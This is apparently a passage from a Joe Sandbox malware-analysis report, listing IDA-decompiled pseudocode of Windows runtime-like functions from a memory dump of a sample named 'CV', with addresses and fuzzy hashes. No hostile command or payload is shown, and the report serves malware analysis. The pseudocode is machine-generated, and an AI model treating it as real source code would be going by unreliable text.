					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0127F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01264620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x01257672
0x0125767f
0x01257689
0x012576de
0x012576de
0x0125768b
0x01257691
0x01257693
0x01257697
0x00000000
0x01257699
0x012576a8
0x00000000
0x012576aa
0x012576ad
0x012576b1
0x00000000
0x012576b3
0x012576b3
0x012576b5
0x012576ba
0x012576bc
0x012576bc
0x012576c0
0x00000000
0x012576c2
0x012576ce
0x012576ce
0x012576c0
0x012576b1
0x012576a8
0x01257697
0x012576d9

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: f4b17aa755645b9706aec7bf6de34a4fa48bdf4612df3f7e7277c1a9cbbf753c
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 91018432760119AFD7609E5FCD91E6B7BADEB94660B680524BE18CB250DA30DD0187B0

Uniqueness

Uniqueness Score: -1.00%

Function 012DC450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E012DC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01289910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E012895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E012895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E012895D0();
				return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x012dc458
0x012dc45d
0x012dc466
0x012dc468
0x012dc469
0x012dc46a
0x012dc46b
0x012dc46e
0x012dc46f
0x012dc471
0x012dc476
0x012dc476
0x012dc47c
0x012dc47e
0x012dc480
0x012dc480
0x012dc483
0x012dc484
0x012dc486
0x012dc488
0x012dc48f
0x012dc491
0x012dc493
0x012dc493
0x012dc48f
0x012dc498
0x012dc49e
0x012dc4ad
0x012dc4ad
0x012dc4b2
0x012dc4b4
0x012dc4cd

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: b089fb0fb3c9843da2212731fbd038b1ef6b2160df1c7d697f2d3bd5e7042ef0
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 70019272150506BFEB25AF69DC80E72FB6DFFA4394F004529F214425A0CB25ACA1CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 01249080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01249080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x13385ec;
				E01262280(_t48, 0x13385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0125FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x133538c; // 0x77996828
					if( *_t84 != 0x1335388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x131f6e8);
						E0129D0E8(0x13385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E013188F5(_t80, _t85, 0x1335388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x13386c0; // 0xca07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x13386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01262280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E013188F5(0x13385ec, _t85, 0x1335388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0128AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x133b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x13384c0;
																			if(_t82 >=  *0x13384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01319063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0124922A(_t99);
										_t64 = E01267D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01318B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x13386c0; // 0xca07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x13386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x13386bc;
													_t87 = 0x13386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01249240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x13386c4;
												_t87 = 0x13386c0;
												L27:
												E01279B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0129D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1335388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x133538c = _t51;
						goto L6;
					}
				}
			}

0x01249082
0x01249083
0x01249084
0x01249085
0x01249087
0x01249096
0x01249098
0x01249098
0x0124909e
0x012490a8
0x012490e7
0x012490e7
0x012490aa
0x012490b0
0x012490b7
0x012490bd
0x012490dd
0x012490e6
0x012490bf
0x012490bf
0x012490c7
0x012490cf
0x012490f1
0x012490f2
0x012490f4
0x012490f5
0x012490f6
0x012490f7
0x012490f8
0x012490f9
0x012490fa
0x012490fb
0x012490fc
0x012490fd
0x012490fe
0x012490ff
0x01249100
0x01249102
0x01249107
0x0124910c
0x01249110
0x01249113
0x01249115
0x01249136
0x0124913f
0x01249143
0x012a37e4
0x012a37e4
0x01249117
0x01249117
0x0124911d
0x00000000
0x0124911f
0x0124911f
0x01249125
0x00000000
0x01249127
0x0124912d
0x01249130
0x01249134
0x01249158
0x0124915d
0x01249161
0x01249168
0x012a3715
0x0124916e
0x0124916e
0x01249175
0x01249177
0x0124917e
0x0124917f
0x01249182
0x01249182
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x01249198
0x01249198
0x01249198
0x0124919a
0x00000000
0x00000000
0x012a371f
0x012a3721
0x012a3727
0x012a372f
0x012a3733
0x012a3735
0x012a3738
0x012a373b
0x012a373d
0x012a3740
0x00000000
0x012a3746
0x012a3746
0x012a3749
0x00000000
0x012a374f
0x012a374f
0x012a3751
0x012a3757
0x012a3759
0x012a375c
0x012a375c
0x012a375e
0x012a375e
0x012a3761
0x012a3764
0x00000000
0x00000000
0x012a3766
0x012a3768
0x012a37a3
0x012a37a3
0x012a37a5
0x012a37a7
0x012a37ad
0x012a37b0
0x012a37b2
0x012a37bc
0x012a37c2
0x012a37c2
0x012a37b2
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x00000000
0x01249195
0x00000000
0x012a376a
0x012a376a
0x012a376a
0x012a376c
0x012a376c
0x012a376f
0x012a3775
0x00000000
0x00000000
0x012a3777
0x012a3779
0x012a3782
0x012a3787
0x012a3789
0x012a3790
0x012a3790
0x012a378b
0x012a378b
0x012a378b
0x012a3792
0x012a3795
0x00000000
0x012a3795
0x00000000
0x012a3779
0x012a3798
0x00000000
0x012a3798
0x00000000
0x012a3768
0x012a379b
0x012a379b
0x012a3751
0x012a3749
0x00000000
0x012a3740
0x012491a0
0x012491a3
0x012491a9
0x012491b0
0x00000000
0x012491b0
0x01249187
0x012491b4
0x012491b4
0x012491bb
0x012491c0
0x012491c5
0x012491c7
0x012a37da
0x012491cd
0x012491cd
0x012491cd
0x012491d2
0x012491d5
0x01249239
0x01249239
0x012491d7
0x012491db
0x012491e1
0x012491e7
0x012491fd
0x01249203
0x0124921e
0x01249223
0x00000000
0x01249205
0x01249205
0x01249208
0x0124920c
0x01249214
0x01249214
0x0124920c
0x012491e9
0x012491e9
0x012491ee
0x012491f3
0x012491f3
0x012491f3
0x012491e7
0x00000000
0x00000000
0x00000000
0x01249134
0x01249125
0x0124911d
0x0124914e
0x012490d1
0x012490d1
0x012490d3
0x012490d6
0x012490d8
0x00000000
0x012490d8
0x012490cf

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ba23ae9c568329c6dc079082cd0bd5b7d0291aae6f3f47f7de66343b12bc13
Instruction ID: 4c07182e1c92626446cf9732b829456efcf7013872087dd6708a4e0dfa28eb88
Opcode Fuzzy Hash: 31ba23ae9c568329c6dc079082cd0bd5b7d0291aae6f3f47f7de66343b12bc13
Instruction Fuzzy Hash: C301FF72621201CFDB298F08D840B22BBE9EF89329F215066E6018B692C374DC81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01314015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01314015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01262280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01262280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13386ac);
					E0124F900(0x13386d4, _t28);
					E0125FFB0(0x13386ac, _t28, 0x13386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0125FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0131401a
0x0131401e
0x01314023
0x01314028
0x01314029
0x0131402b
0x0131402f
0x01314043
0x01314046
0x01314051
0x01314057
0x0131405f
0x01314062
0x01314067
0x0131406f
0x0131407c
0x0131407c
0x0131408c
0x0131408c
0x01314097

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6038a8ac7b6acf17b6c27ca3d99c7f572b762e49e9d2c676496bd8ad7f9ba189
Instruction ID: e464c3e7d45647091aa881eacb30ca00fc1fc3d5be4a56b41af9ab35c06aad9f
Opcode Fuzzy Hash: 6038a8ac7b6acf17b6c27ca3d99c7f572b762e49e9d2c676496bd8ad7f9ba189
Instruction Fuzzy Hash: 4E018471211546BFD355AB69CE80E23F7ACFB95664B000229F50883A51CB38EC51C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 013014FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E013014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x133d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0128FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x013014fb
0x013014fb
0x0130150a
0x01301514
0x01301519
0x0130151b
0x01301526
0x0130152c
0x01301534
0x01301537
0x0130153a
0x01301545
0x01301557
0x01301547
0x01301550
0x01301550
0x01301562
0x01301563
0x01301565
0x0130156a
0x0130157f

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5477ec312c8c22e5868afa94ed3ad3b20858c963b76766f099482a8635543f
Instruction ID: c0c9327ab08039c7a9dc5648c57d5a474f242459b04151df8c65f27a30acb1ba
Opcode Fuzzy Hash: bb5477ec312c8c22e5868afa94ed3ad3b20858c963b76766f099482a8635543f
Instruction Fuzzy Hash: 44019E71A11258AFDB10EFA8D841EBEBBBCEF44714F40406AF905EB380DA74DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0130138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0130138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x133d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0128FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0130138a
0x0130138a
0x01301399
0x013013a3
0x013013a8
0x013013aa
0x013013b5
0x013013bb
0x013013c3
0x013013c6
0x013013c9
0x013013d4
0x013013e6
0x013013d6
0x013013df
0x013013df
0x013013f1
0x013013f2
0x013013f4
0x013013f9
0x0130140e

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898bb124379b61a81cf0f801b3dc32a2f2cab2f0683bb000fc64f22e0d1296fa
Instruction ID: b25135855afaacfa506561331f4a575b00872eb19b813c4e0e56baca4c7154ac
Opcode Fuzzy Hash: 898bb124379b61a81cf0f801b3dc32a2f2cab2f0683bb000fc64f22e0d1296fa
Instruction Fuzzy Hash: CE018071A11218AFDB10EFA8D881BAEBBB8EF54714F004056B900AB280D674DA40C794

Uniqueness

Uniqueness Score: -1.00%

Function 012458EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x133d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1225c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01245943() != 0 &&  *0x1335320 > 5) {
					E012C7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E012C7B5E( &_v28, _t28);
					_t11 = E012C7B9C(0x1335320, 0x122bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0128B640(_t11, _t17, _v8 ^ _t29, 0x122bf15, _t27, _t28);
			}

0x012458fb
0x012458fe
0x01245906
0x0124590a
0x0124593c
0x0124593c
0x0124590c
0x0124590c
0x01245911
0x00000000
0x01245913
0x01245913
0x01245913
0x01245911
0x0124591d
0x012a1035
0x012a103c
0x012a103f
0x012a1056
0x012a1056
0x0124593b

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b450eb3b5dc781ceacabb91bed24ce0f00e389eeaa5b596c916a2201c1fdd8b8
Instruction ID: 4ab6c974dc48be252f29104460f8f99e9350c0c2277d0d9631676e92132d3098
Opcode Fuzzy Hash: b450eb3b5dc781ceacabb91bed24ce0f00e389eeaa5b596c916a2201c1fdd8b8
Instruction Fuzzy Hash: 8701F239A30105ABC718EA28C801ABE77ACEF85630F840169EA059B244EE70DD01C794

Uniqueness

Uniqueness Score: -1.00%

Function 0125B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01267D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E012C7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0125b037
0x0125b039
0x0125b03b
0x0125b040
0x012aa60e
0x00000000
0x00000000
0x012aa61d
0x0125b04b
0x0125b04e
0x012aa627
0x012aa634
0x00000000
0x00000000
0x012aa641
0x012aa653
0x012aa643
0x012aa64c
0x012aa64c
0x012aa65b
0x00000000
0x00000000
0x00000000
0x012aa66c
0x0125b057
0x0125b057
0x0125b057
0x0125b046
0x0125b046
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: c74877ad3795d363223cb04ea27fd3cc4e0b419b1ba4e92095aa1704aa5c6eb1
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 80018F722209819FE762871CC988F767BDDEF85B54F0940A1FB19CBA91D778DC40CA20

Uniqueness

Uniqueness Score: -1.00%

Function 01311074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01311074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0131165E(__ebx, 0x1338ae4, (__edx -  *0x1338b04 >> 0x14) + (__edx -  *0x1338b04 >> 0x14), __edi, __ecx, (__edx -  *0x1338b04 >> 0x14) + (__edx -  *0x1338b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0130AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01267D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E012FFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01311074
0x01311080
0x01311082
0x0131108a
0x0131108f
0x01311093
0x013110ab
0x013110ab
0x013110c3
0x013110cf
0x013110e1
0x013110d1
0x013110da
0x013110da
0x013110e9
0x013110f5
0x013110f5
0x013110fe

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5b94218649a7d34d0179b71f95a5d05e0171a1dfd2871a0ba43e9790ba2765
Instruction ID: 9fece35451ac6a8b1695b717e202b12f246f6b89279dd66bfaf85ef754881cc6
Opcode Fuzzy Hash: 0f5b94218649a7d34d0179b71f95a5d05e0171a1dfd2871a0ba43e9790ba2765
Instruction Fuzzy Hash: 0C014C72A047429FD715DF3CCD00B5A7BD9ABD4318F04CA29FA8583694DE30D554CB92

Uniqueness

Uniqueness Score: -1.00%

Function 012FFE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E012FFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
